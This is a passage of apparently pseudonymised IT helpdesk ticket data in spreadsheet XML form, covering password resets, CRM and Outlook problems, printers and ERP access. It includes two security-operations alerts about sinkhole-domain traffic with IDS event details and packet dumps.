    <s v="name:xmeytziq dcgwuvfk_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xmeytziq.dcgwuvfk@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i need to get access to tjlizqgc ngvwoukp calendar i have taken over the ehs duties here in usa as well as usa indiana."/>
    <s v="xmeytziq dcgwuvfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to see name in engineering_tool"/>
    <s v="unable to see name in engineering_tool"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_861712"/>
    <s v="ticket update on inplant_861712"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mii password reset"/>
    <s v="name:itclukpe aimcfeko_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:itclukpe.aimcfeko@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:need user name and password reset for mii for wpcatozg roceshun em#21111123_x000a_his current id and password will let him log in the system but not in mii"/>
    <s v="wpcatozg roceshun"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm add-in for outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pnhlrfao.ivjxlyfz@gmail.com_x000d__x000a__x000d__x000a_global it team,_x000d__x000a__x000d__x000a_i do not currently have connectivity between crm and microsoft outlook on my company computer. we are now required to begin to link emails and contact information between outlook and crm and without the crm add-in working on my device, i am currently unable to do this . please open a ticket to get this completed. "/>
    <s v="pnhlrfao ivjxlyfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for zqbgmfle.wrkmieao@gmail.com"/>
    <s v="password reset for zqbgmfle.wrkmieao@gmail.com"/>
    <s v="nivqoxyt ivrhjmnx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_861691"/>
    <s v="ticket update on inplant_861691"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distributor_tool and engineering_tool do not show inventory for mm 5387556"/>
    <s v="distributor_tool and engineering_tool do not show inventory for mm 6498667, even though mmbe transaction shows unrestricted stock in plant_101 and dvw1._x000d__x000a_other mm numbers such as 6498662 or 4870484 do not have this issue._x000d__x000a_not sure if there are other mm numbers where we do have stock but distributor_tool and engineering_tool aren't seeing such stock._x000d__x000a__x000d__x000a_please see attached email for background and attached screenshots from materials_managementbe transaction, engineering_tool and distributor_tool._x000d__x000a_"/>
    <s v="hwfrvpbc thofnixk"/>
    <x v="21"/>
  </r>
  <r>
    <s v="unable to connect to ca07 printer"/>
    <s v="unable to connect to ca07 printer"/>
    <s v="skxfydnr cdgrsqnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000d__x000a__x000d__x000a_enter user id of user having the issue:  bakertm_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:  _x000d__x000a__x000d__x000a_describe the issue:  userid no longer active for SID_1.   reset passwords with password_management_tool - all changed but SID_1 as userid no longer active.  please allow access as needed for erp mii uacyltoe hxgayczeing._x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="udhsyljz cogbript"/>
    <x v="19"/>
  </r>
  <r>
    <s v="re: ticket_no1551447 -- comments added"/>
    <s v="_x000d__x000a__x000d__x000a_received from: svlcqmnb.qlwerhxt@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="svlcqmnb qlwerhxt"/>
    <x v="52"/>
  </r>
  <r>
    <s v="csqe - automatic knowledge base sync"/>
    <s v="we want to setup erp to automatically sync and push updated knowledge bases to the ipc/configair server space._x000d__x000a_this is a standard practice, to not require network admin to do that manually, which also is to eliminate various compatibility issues from doing that manually with extracted files._x000d__x000a_for setup in each system in turn, SID_21, SID_1, and SID_34 for change/delta moves to configair servers from erp updates."/>
    <s v="iqtynrbf fyvjpbui"/>
    <x v="13"/>
  </r>
  <r>
    <s v="cannot print anymore on tc78"/>
    <s v="printer is asking for trusted source and driver install but does still not work after update..."/>
    <s v="dtnhwjve tqdhvazx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="locked out on the crm account"/>
    <s v="locked out on the crm account"/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to drawings in net weaver"/>
    <s v="name:jashyht mkuhtyhui_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jhxwiply.midhcnze@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i have erp netweaver business client but i am unable to pull up drawings. i have seen coworker screens and they look similar but the drawing tab is missing on mine"/>
    <s v="jhxwiply midhcnze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm - outlook "/>
    <s v="_x000d__x000a__x000d__x000a_received from: uvorgwts.mlqzaicb@gmail.com_x000d__x000a__x000d__x000a_hello i.t. team,_x000d__x000a__x000d__x000a_i need to get my outlook and crm remfg_toolted. please reach out to me as soon as possible._x000d__x000a__x000d__x000a_best "/>
    <s v="uvorgwts mlqzaicb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm/outlook"/>
    <s v="_x000a__x000a_received from: zolnubvq.ehrqifxp@gmail.com_x000a__x000a_i no longer have the crm portion or add on in my outlook.  i need to have this installed._x000a__x000a_login webdhyt_x000a_employee number 60676837_x000a__x000a_best "/>
    <s v="zolnubvq ehrqifxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm add-in / outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mdbegvct.dbvichlg@gmail.com_x000d__x000a__x000d__x000a_hi it â€“ i'm not seeing the crm options in my outlook.  please let me know how i can get that working as i have to be in dallas next monday for training.  "/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm addin in outook "/>
    <s v="i need to have crm addin in outlook to perform my daily job functions moving forward"/>
    <s v="ufxdkqbc uehvxmfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_861658"/>
    <s v="ticket update on inplant_861658"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sent items folder not showing up in outlook."/>
    <s v="sent items folder not showing up in outlook."/>
    <s v="vyluaepi dtwfaejr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3045_ap failed in job_scheduler at: 09/19/2016 11:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3045_ap failed in job_scheduler at: 09/19/2016 11:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="unable to fill the expense report form for employee"/>
    <s v="unable to fill the expense report form for employee"/>
    <s v="xziwkgeo gdiraveu"/>
    <x v="19"/>
  </r>
  <r>
    <s v="quotation printing incorrect voucher discount"/>
    <s v="see attached example - 3116245007.  discount applied was 57.5%, but quote copy is showing 115%.  not sure where the pdf is picking up the additional 57.5%._x000d__x000a__x000d__x000a_also see example 3116220390.  this will show the print on 8/29 was correct, and what was printed today is not.  did something move over the weekend that can be backed out??_x000d__x000a_"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ticket_no1543461 - ticket update"/>
    <s v="ticket_no1543461 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sfb issue "/>
    <s v="_x000a_summary:unable to log into skype calls"/>
    <s v="tjyoheic eyuwsgld"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket_no1546770 - ticket update"/>
    <s v="ticket_no1546770 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on ticket_no1542996 "/>
    <s v="update on ticket_no1542996 "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password for hana systems SID_60,SID_59 for user id : bollmam"/>
    <s v="reset password for hana systems SID_60,SID_59 for user id : bollmam._x000d__x000a_kindly make it on priority basis."/>
    <s v="xagyhbio jvrdnpkh"/>
    <x v="52"/>
  </r>
  <r>
    <s v="please delete sm35 job"/>
    <s v="same issue as inc1512788_x000d__x000a__x000d__x000a_please delete rm_eb1160912"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="4"/>
  </r>
  <r>
    <s v="sandplant_162  -    fc9/15 Â· drlab HostName_1175 is down since 09:53 pm et on 09/19"/>
    <s v="sandplant_162  -    fc9/15 Â· drlab HostName_1175  is down since 09:53 pm et on 09/19"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="terhyury jerhtyua, employee of usa, is locked out of mii - please unlock and verify if employee has more than SID_34 access"/>
    <s v="terhyury jerhtyua, employee of usa, is locked out of mii - please unlock and verify if employee has more than SID_34 access_x000d__x000a_employee is unable to report production and capture value add data on mii "/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="schdule name:&quot;final&quot; in job_scheduler :batch job documentation needs to be updated"/>
    <s v="schdule name:&quot;final&quot; in job_scheduler :batch job documentation needs to be updated"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="sfb issue "/>
    <s v="can't access skype for business 2015_x000d__x000a_comes up with message &quot;c:/programdnty files/microsoft office 15/root/office 15/lync.exe"/>
    <s v="iwtvrhnz rxiumhfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33805815) : possible malware infection - traffic from sinkhole domain to apul7700790"/>
    <s v="=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 94661793_x000d__x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 195.22.28.222_x000d__x000a_source port: 80_x000d__x000a_source ip geolocation: lisbon, prt_x000d__x000a_destination ip: 71.58.38.9639_x000d__x000a_destination hostname: apul8811801 _x000d__x000a_destination port: 51547_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http status code: 302_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.68.49.4169_x000d__x000a_device name: isensor05.company.com_x000d__x000a_log time: 2016-09-19 at 02:13:00 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 2422739_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 2_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 699417_x000d__x000a_inspector event id: 880503574_x000d__x000a_ontology id: 200020003203755736_x000d__x000a_event type id: 200020003203582148_x000d__x000a_agent id: 102835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6873][event id: 2422739][time: 2585362291.144214]_x000d__x000a_[src ip: 195.22.28.222][dst ip: 71.58.38.9639][sport/itype: 80][dport/icode: 51547][proto: 6]_x000d__x000a_09/19/2016-02:13:00.144214 195.22.28.222:80 -&gt; 71.58.38.9639:51547_x000d__x000a_tcp ttl:49 tos:0x0 id:15452 iplen:20 dgmlen:391 df_x000d__x000a_***ap*** seq: 0x7da4b41b ack: 0x836645ee win: 0x68b0 tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /domain/newflv.sohu.ccgslb.net]_x000d__x000a__x000d__x000a_[ex http_hostname 10: sso.anbtr.com]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.....i.wv3..........e...&lt;\@.1........,.e.p.[}....fe.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.19.sep.2016.02:13:00.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=3b22f0eec4487da1ac8019caac1283a4;.domain=.ccgslb.net..location:._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 ac49 df57 5633 0200 8701 0000 .....i.wv3......_x000d__x000a_000010 8701 0000 4500 0187 3c5c 4000 3106 0bb0 ....e...&lt;\@.1..._x000d__x000a_000020 c316 1cde 0a2c 1645 0050 c95b 7da4 b41b .....,.e.p.[}..._x000d__x000a_000030 8366 45ee 5018 68b0 bfb0 0000 4854 5450 .fe.p.h.....http_x000d__x000a_000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t_x000d__x000a_000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv_x000d__x000a_000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:_x000d__x000a_000070 204d 6f6e 2c20 3139 2053 6570 2032 3031 .mon,.19.sep.201_x000d__x000a_000080 3620 3032 3a31 333a 3030 2047 4d54 0d0a 6.02:13:00.gmt.._x000d__x000a_000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te_x000d__x000a_0000a0 7874 2f68 746d 6c0d 0a43 6f6e 6e65 6374 xt/html..connect_x000d__x000a_0000b0 696f 6e3a 2063 6c6f 7365 0d0a 5365 742d ion:.close..set-_x000d__x000a_0000c0 436f 6f6b 6965 3a20 616e 6274 723d 3362 cookie:.anbtr=3b_x000d__x000a_0000d0 3232 6630 6565 6334 3438 3764 6131 6163 22f0eec4487da1ac_x000d__x000a_0000e0 3830 3139 6361 6163 3132 3833 6134 3b20 8019caac1283a4;._x000d__x000a_0000f0 646f 6SID_26 696e 3d2e 6363 6773 6c62 2e6e domain=.ccgslb.n_x000d__x000a_000100 6574 0d0a 4c6f 6361 7469 6f6e 3a20 6874 et..location:.ht_x000d__x000a_000110 7470 3a2f 2f78 7373 6f2e 6e65 7766 6c76 tp://xsso.newflv_x000d__x000a_000120 2e73 6f68 752e 6363 6773 6c62 2e6e 6574 .sohu.ccgslb.net_x000d__x000a_000130 2f33 6232 3266 3065 6563 3434 3837 6461 /3b22f0eec4487da_x000d__x000a_000140 3161 6338 3031 3963 6161 6331 3238 336sartlgeo lhqksbdxac8019caac1283a_x000d__x000a_000150 340d 0a0d 0a47 6f20 6874 7470 3a2f 2f78 4....go._x000d__x000a_000160 7373 6f2e 6e65 7766 6c76 2e73 6f68 752e sso.newflv.sohu._x000d__x000a_000170 6363 6773 6c62 2e6e 6574 2f33 6232 3266 ccgslb.net/3b22f_x000d__x000a_000180 3065 6563 3434 3837 6461 3161 6338 3031 0eec4487da1ac801_x000d__x000a_000190 3963 6161 6331 3238 3361 34 9caac1283a4_x000d__x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="access point company_ita_company_milano_ap05 is down"/>
    <s v="ip 83.43.63.0179_x000d__x000a_blue light blinking_x000d__x000a_does not permit connection_x000d__x000a__x000d__x000a_could you please check ?"/>
    <s v="ziwkespl dyehbrst"/>
    <x v="3"/>
  </r>
  <r>
    <s v="t&amp;d inwarehouse_tool 0512678028 - pricing error"/>
    <s v="hi,_x000d__x000a__x000d__x000a_please refer below mail from branch  &amp; attached t&amp;d inwarehouse_tool of plant_61.  the inwarehouse_tool has picked the total basic value as rs.2,40,991.50 &amp; the excise duty has got charged &amp; paid accordingly, instead of correct total basic value of rs.1,40,000.00, (70,000 x 2) as per previous inwarehouse_tool#0512508978/07.04.16.  kindly find &amp; fix the problem for future inwarehouse_tool to capture the correct total basic value to avoid paying higher excise duty. _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="iwqfelcu gsubfiml"/>
    <x v="12"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="afijkocw rjtxslpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33809307 ) : possible malware infection - traffic from sinkhole domain to android-13849fa3"/>
    <s v="source ip :195.22.28.222 _x000a_system name :android-13849fa3e9c2e1e3_x000a_user  name:unknown_x000a_location :unknown_x000a_sep , sms status :_x000a_field sales user ( yes / no) :  _x000a_dsw event log:_x000a__x000a_==================================================================================================_x000a_=========================_x000a_incident overview_x000a_=========================_x000a_we are seeing your 10.16.4.16/isensor04.company.com device generating '52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.22.28.222 to port 55372/tcp of your android-13849fa3e9c2e1e3/12.90.42.78296 device indicating that the host is most likely infected with malware. _x000a__x000a_this return traffic indicates that android-13849fa3e9c2e1e3/12.90.42.78296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a__x000a_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a_1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))_x000a_2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000a__x000a_sincerely,_x000a_ soc_x000a__x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_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a__x000a_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a__x000a_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a__x000a_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quot;company x is infected with y&quot;, which may lead to reputational damage._x000a__x000a_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a__x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 84221656_x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000a_occurrence count: 1_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 195.22.28.222_x000a_source port: 80_x000a_source ip geolocation: lisbon, prt_x000a_destination ip: 12.90.42.78296_x000a_destination hostname: android-13849fa3e9c2e1e3_x000a_destination port: 55372_x000a_destination mac address: 84:38:38:49:8e:8c_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a_http status code: 302_x000a__x000a_device information_x000a_device ip: 10.16.4.16_x000a_device name: isensor04.company.com_x000a_log time: 2016-09-19 at 13:16:54 utc_x000a_action: not blocked_x000a_vendor eventid: 792629_x000a_cvss score: -1 _x000a_vendor priority: 2_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 699417_x000a_inspector event id: 637489392_x000a_ontology id: 200020003203755736_x000a_event type id: 200020003203582148_x000a_agent id: 102823_x000a__x000a_event detail:_x000a_[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000a_[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602983][event id: 792629][time: 2585302125.450357]_x000a_[src ip: 195.22.28.222][dst ip: 12.90.42.78296][sport/itype: 80][dport/icode: 55372][proto: 6]_x000a_09/19/2016-13:16:54.450357 195.22.28.222:80 -&gt; 12.90.42.78296:55372_x000a_tcp ttl:55 tos:0x0 id:18690 iplen:20 dgmlen:395 df_x000a_***ap*** seq: 0x207261f ack: 0x6acc8edd win: 0x35 tcplen: 32_x000a_tcp options (3) =&gt; nop nop ts: 4851788645 6722888 _x000a_==pcap 1==_x000a__x000a_[o:security]_x000a__x000a_[correlation_data]_x000a_sep 19 09:16:17 60.43.89.120 dhcpd[31183]: dhcpack on 12.90.42.78296 to 84:38:38:49:8e:8c (android-13849fa3e9c2e1e3) via eth2 relay 97.65.25.820 lease-duration 604800 (renew)_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_....f..w5...........e...i.@.7............p.l..&amp;.j......5..........5..u..http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.19.sep.2016.13:16:54.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=b3dc36813a835f65e5f206184225e1f3;.domain=.allinvest.us..location:._x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 46e5 df57 35df 0600 8b01 0000 ....f..w5......._x000a_000010 8b01 0000 4500 018b 4902 4000 3706 fea2 ....e...i.@.7..._x000a_000020 c316 1cde 0a10 10c4 0050 d84c 0207 261f .........p.l..&amp;._x000a_000030 6acc 8edd 8018 0035 ca7f 0000 0101 080a j......5........_x000a_000040 def6 359e 0055 a101 4854 5450 2f31 2e31 ..5..u..http/1.1_x000a_000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo_x000a_000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:._x000a_000070 6e67 696e 780d 0a44 6174 653a 204d 6f6e nginx..date:.mon_x000a_000080 2c20 3139 2053 6570 2032 3031 3620 3133 ,.19.sep.2016.13_x000a_000090 3a31 363a 3534 2047 4d54 0d0a 436f 6e74 :16:54.gmt..cont_x000a_0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h_x000a_0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:_x000a_0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook_x000a_0000d0 6965 3a20 616e 6274 723d 6233 6463 3336 ie:.anbtr=b3dc36_x000a_0000e0 3831 3361 3833 3566 3635 6535 6631 3935 813a835f65e5f195_x000a_0000f0 3037 3331 3134 6531 6633 3b20 646f 6SID_26 073114e1f3;.doma_x000a_000100 696e 3d2e 616c 6c69 6e76 6573 742e 7573 in=.allinvest.us_x000a_000110 0d0a 4c6f 6361 7469 6f6e 3a20 6874 7470 ..location:.http_x000a_000120 3a2f 2f78 7373 6f2e 6865 6c70 2e61 6c6c ://xsso.help.all_x000a_000130 696e 7665 7374 2e75 732f 6233 6463 3336 invest.us/b3dc36_x000a_000140 3831 3361 3833 3566 3635 6535 6631 3935 813a835f65e5f195_x000a_000150 3037 3331 3134 6531 6633 0d0a 0d0a 476f 073114e1f3....go_x000a_000160 2068 7474 703a 2f2f 7873 736f 2e68 656c ._x000a_000170 702e 616c 6c69 6e76 6573 742e 7573 2f62 p.allinvest.us/b_x000a_000180 3364 6333 3638 3133 6138 3335 6636 3565 3dc36813a835f65e_x000a_000190 3566 3139 3530 3733 3131 3465 3166 33 5f206184225e1f3_x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="user switzerlandim blocked in netweaver"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vogtfyne.isugmpcn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_please unlock netweaver access for user switzerlandim â€“ marftgytin switzerlandik._x000d__x000a_i reinstalled the application, now it reports too many failed logins_x000d__x000a__x000d__x000a_best "/>
    <s v="xeoycjsu iuasmloj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please install ms visio std on the clients pc"/>
    <s v="please install ms visio std on the clients pc"/>
    <s v="unzfykar osxmbhav"/>
    <x v="2"/>
  </r>
  <r>
    <s v="reset passwords for dwfiykeo argtxmvcumar using password_management_tool password reset."/>
    <s v="i have been locked out of SID_39, client 120 function specifically for the crm system.  i made one attempt at entering my password and i received: &quot;password logon no longer possible - too many failed attempts&quot;."/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="16"/>
  </r>
  <r>
    <s v="software request - visio"/>
    <s v="need visio installed on my laptop."/>
    <s v="unzfykar osxmbhav"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to connect to skype "/>
    <s v="unable to connect to skype "/>
    <s v="ksgytjqr ojdukgzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connection issues with secomea site manager"/>
    <s v="well i have fighting with this all week. our suppliers technical department has been helping also._x000d__x000a__x000d__x000a_just to refresh your memory we are having trouble connecting secomea site managers to the secomea cloud._x000d__x000a__x000d__x000a_history:_x000d__x000a__x000d__x000a_i configured a total of five secomea site mangers and i uacyltoe hxgaycze them as each one is complete_x000d__x000a_the first two worked, and still work fine_x000d__x000a_the third one started dropping off of the cloud and wont connect at all now_x000d__x000a_units four and five wont connect at all and never did_x000d__x000a__x000d__x000a_i tried unit three at building one and twoâ€¦no luck_x000d__x000a__x000d__x000a_i took unit three home and connected it to my routerâ€¦it connects and i can see it on the gate manager!_x000d__x000a__x000d__x000a_we use these in every machine we build so i'm asking for help from company's it department and some direction. _x000d__x000a_i realize it might not be familiar with this product so i have attached a simple troubleshooting guide from secomea._x000d__x000a__x000d__x000a_"/>
    <s v="sxzuctga qnwhyapd"/>
    <x v="3"/>
  </r>
  <r>
    <s v="kein zugriff auf zeiterfassung und sonstiges netzwerk"/>
    <s v="kein zugriff auf zeiterfassung und sonstiges netzwerk /spdczoth vajtodny"/>
    <s v="spdczoth vajtodny"/>
    <x v="24"/>
  </r>
  <r>
    <s v="outlook does not start."/>
    <s v="outlook does not start."/>
    <s v="sghamujc shompueb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vfx3 billing errors"/>
    <s v="please see the attached screen print for vfx3 billing errors for 0612893276 and 0612893277, both of which state: foreign trade data incomplete.  the billing document will not create."/>
    <s v="slkxgzdj wxpytevu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="mobile device activation"/>
    <s v="lhycpqra fdhyxqrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power supply issue for pwr8hmc1.hq.company.com..  "/>
    <s v="power supply issue for pwr8hmc1.hq.company.com..  "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issue with symantec endpoint protection"/>
    <s v="i have 4 warning messages on my symantec endpoint protection icon on my taskbar.  please see the attached document showing these messages."/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="49"/>
  </r>
  <r>
    <s v="trying to get the status of ticket number ticket_no0438372"/>
    <s v="name:erirtc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ntsowaem.jfgslyde@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:trying to get the status of ticket number ticket_no1549483?"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to mobile broadband "/>
    <s v="unable to connect to mobile broadband "/>
    <s v="ksgytjqr ojdukgzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor not working."/>
    <s v="monitor not working."/>
    <s v="mknoeicg aziptqvu"/>
    <x v="2"/>
  </r>
  <r>
    <s v="need mouse replacement "/>
    <s v="need mouse replacement _x000d__x000a_ltcw7406044"/>
    <s v="dxgyefir rczsatqu"/>
    <x v="2"/>
  </r>
  <r>
    <s v="maus funktioniert nicht mehr richtig. bitte ersetzen."/>
    <s v="maus funktioniert nicht mehr richtig. bitte ersetzen. /howfanzi siavgtby"/>
    <s v="howfanzi siavgtby"/>
    <x v="24"/>
  </r>
  <r>
    <s v="brauche eine neue funktionierende maus."/>
    <s v="brauche eine neue funktionierende maus. /tkhaymqg cwuqzyvm"/>
    <s v="tkhaymqg cwuqzyvm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to load outlook due to crm"/>
    <s v="unable to load outlook due to crm"/>
    <s v="ksgytjqr ojdukgzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="smart phone issue"/>
    <s v="my iphone 6 now has a reduced ear speaker(?). when speaking to an individual, i can not hear them with any volume. very faint. i must use the speaker phone, which makes the call non-secure. can the phone be repaired or can i replace it?"/>
    <s v="ndyrowef biwecrgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="keine anmeldung auf skype mÃ¶glich"/>
    <s v="keine anmeldung auf skype mÃ¶glich /vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="employee owned mobility agreement"/>
    <s v="_x000d__x000a__x000d__x000a_received from: clzwduvj.keflinbj@gmail.com_x000d__x000a__x000d__x000a_hello it support team,_x000d__x000a__x000d__x000a_please release the device as per attached form as an employee owned mobile device. the corresponding form is attached._x000d__x000a_for the moment i am using the outlook app._x000d__x000a__x000d__x000a_hello joftgost,_x000d__x000a__x000d__x000a_please approve the form in return by mail._x000d__x000a__x000d__x000a_"/>
    <s v="clzwduvj keflinbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no response from caller"/>
    <s v="no response from caller"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need to know the members in lhqftphfm*"/>
    <s v="i need to know the members in lhqftphfm*.  could you please provide it in an excel file format"/>
    <s v="ljyfsaox paxockls"/>
    <x v="19"/>
  </r>
  <r>
    <s v="account locked out on bex"/>
    <s v="account locked out on bex"/>
    <s v="tyuhfljp zyjfpgtk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is not working . i've updated the sp 2 but .. nothing"/>
    <s v="outlook is not working . i've updated the sp 2 but .. nothing"/>
    <s v="hnueblym pxfqkrye"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please setup printers dg04 and dg08 on HostName_837 with x64 print drivers"/>
    <s v="please setup printers dg04 and dg08 on HostName_837 with x64 print drivers"/>
    <s v="glnfyoqe fexlisau"/>
    <x v="11"/>
  </r>
  <r>
    <s v="printer's won't update their driver"/>
    <s v="i cannot print at all the status of the printers i have mapped to are all &quot;need driver update&quot;. however, when i try to update the driver it will not update it, but quits half way through the installation. "/>
    <s v="amylzuog irtsuqey"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer problem (reroute) / issue information"/>
